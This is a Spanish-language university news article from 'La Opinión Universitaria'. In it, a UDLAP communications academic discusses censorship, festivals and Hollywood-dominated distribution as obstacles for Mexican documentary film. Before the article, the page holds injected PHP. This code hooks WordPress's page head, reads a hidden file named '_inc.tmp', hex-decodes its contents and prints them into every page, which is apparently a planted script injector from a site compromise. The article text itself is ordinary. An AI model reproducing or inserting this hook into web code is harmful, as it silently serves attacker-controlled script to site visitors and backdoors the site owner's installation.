if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } El mayor riesgo para el cine de documental es la censura: Académico UDLAP – La Opinión Universitaria La Opinión Universitaria
Menu

El mayor riesgo para el cine de documental es la censura: Académico UDLAP

 

  • Uno de los obstáculos que marginan al documental es el dominio de las distribuidoras de Hollywood y las cadenas de exhibición en México: Tejada Domínguez

Por Diego Cuautle

Actualmente hay esfuerzos por hacer estos documentales más visibles, pero también existen prácticas en la distribución cinematográfica que marginan al género. Aunque el mayor riesgo es la censura, señaló Manuel Antonio Pérez Tejada Domínguez, académico de Ciencias de la Comunicación de la Universidad de las Américas Puebla (UDLAP).

“El balance final resulta complejo de definir. Hoy en día, la producción documental en México muestra trabajos sobresalientes donde se apuesta por nuevas estrategias cinematográficas que intentan rebasar etiquetas y estigmas”, comentó.

Comentó que entre los esfuerzos hacia la visibilidad del documental se cuentan los festivales de cine como el del 2000 que aparece Contra el Silencio Todas las Voces que se avoca al documental social.

En 2006, se organiza DocsDF en la ciudad de México, el cual retoma el premio José Rovirosa. Los festivales más importantes del país, como los internacionales de Guadalajara (FICG) y de Morelia (FICM), han reconocido la calidad del documental mexicano. El FICG en 2003 da su premio Mayahuel a mejor película a dos documentales: Recuerdos, de Marcela Arteaga y La pasión de María Elena, de Mercedes Moncada.

“Uno de los obstáculos que marginan al documental es el dominio de las distribuidoras de Hollywood y las cadenas de exhibición en México. Recientemente, la multipremiada Cuates de Australia (González, 2011), tuvo una programación muy limitada en cines comerciales. Otros documentales ni siquiera llegan a exhibirse”, dijo.

Por ello, comentó en los últimos años se ha formado la red de documentalistas DOCRED, con capítulos en cada estado. La red tiene entre sus objetivos darle una mayor visibilidad al género.

Sirva el caso de Presunto culpable (Hernández y Smith, 2011) para ejemplificar la calidad del documental en México y lo que enfrenta. Con una estructura narrativa efectiva y una edición ágil, la cinta captura al espectador. Sin embargo, a pesar de su éxito en los cines, tuvo que salir de la programación, víctima de la censura. Hoy, sus productores están en riesgo de llegar a la cárcel por atreverse a mostrar, solo como un documental puede hacerlo, un sistema judicial corrupto.

“Así, se puede afirmar que el documental en México está sano en su producción, pero su visibilidad aún requiere superar obstáculos en la distribución y exhibición. Pero, sobre todo, debe enfrentar los riesgos de una censura, a veces implacable”, finalizó.

No comments

Deja una respuesta

Tweets recientes